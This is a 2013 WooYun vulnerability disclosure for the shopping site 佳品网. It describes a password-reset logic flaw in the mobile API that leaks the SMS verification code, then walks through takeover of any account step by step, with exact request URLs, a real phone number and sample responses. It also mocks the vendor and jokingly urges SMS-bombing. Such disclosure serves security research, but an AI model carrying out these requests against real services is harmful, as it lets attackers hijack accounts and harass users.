双节#佳品网快速重置白富美妹纸帐号

漏洞概要

缺陷编号:WooYun-2013-017952

漏洞标题:双节#佳品网快速重置白富美妹纸帐号

相关厂商:佳品网

漏洞作者:O.o

提交时间:2013-01-27 13:25

公开时间:2013-02-01 13:26

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

Tags标签:

漏洞详情

披露状态:

2013-01-27: 细节已通知厂商并且等待厂商处理中
2013-01-27: 厂商已查看当前漏洞内容,细节仅向厂商公开
2013-02-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

2.14乃们懂得~佳品网的东西送白富美女神最有爱了~貌似有些账号还有资金哦~

详细说明:

1.获取验证码http://m.vipstore.com/androidmember/getpassbytel/login_name/{18980706050}/type/tel{18980706050}更改为需要重置的帐号的手机号返回:<?xml version="1.0" encoding="utf-8"?><GetPass><statusCode>1</statusCode><description>验证码发送成功,请在2小时内用手机收到的验证码进行密码重置!</description><memberid>2672454</memberid><activecode>member_password_check,594076</activecode></GetPass>其中获取到手机号对应用户ID和验证码<memberid>2672454</memberid><activecode>member_password_check,594076</activecode>

2.验证验证码并获取更改密码的令牌http://m.vipstore.com/androidmember/getpassbytelcheck/check_code/{594076}/member_id/{2672454}{2672454}为需要重置密码的帐号ID,从1处获得{594076}为重置密码的验证码,从1处获得返回<?xml version="1.0" encoding="utf-8"?><GetPassCheck><statusCode>1</statusCode><description>验证通过!</description><memberid>2672454</memberid>

</GetPassCheck>其中获得密码重置令牌

3.重置密码http://m.vipstore.com/androidmember/passreset/code/{00168745b803896429ae24e66485aa14}/id/{2672454}/type/tel/pass/{112233}{00168745b803896429ae24e66485aa14}为密码重置令牌,从2处获得{2672454}为需要重置密码的帐号ID,从1处获得{112233}为新密码返回<?xml version="1.0" encoding="utf-8"?><PassReset><statusCode>1</statusCode><description>更改密码成功</description></PassReset>

另外1处的漏洞存在短信轰炸功能,快来轰炸女神身边其他的糕富帅吧~让他们收不到女神的短信。藕耶耶~

漏洞证明:

有图有真相

wooyun方证明用18980706050证明或者用任意手机注册个证明即可。网站方证明同wooyun方证明或者自己看代码。

修复方案:

自己改代码,另外接口用get很蛋疼啊~太没难度了!都不用开firefox发包,遨游都可以搞定~

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-02-01 13:26

厂商回复:

最新状态:

暂无

评价

  1. 2010-01-01 00:00 无敌L.t.H 白帽子 | Rank:21 漏洞数:4)

    女神一般不是坐专机去免税店的么?

  2. 2010-01-01 00:00 O.o 白帽子 | Rank:105 漏洞数:12)

    @无敌L.t.H 这···我觉得女神宅着才有爱~

  3. 2010-01-01 00:00 小胖胖要减肥 白帽子 | Rank:492 漏洞数:66)

    网站都要关闭了 这个等着自己公开把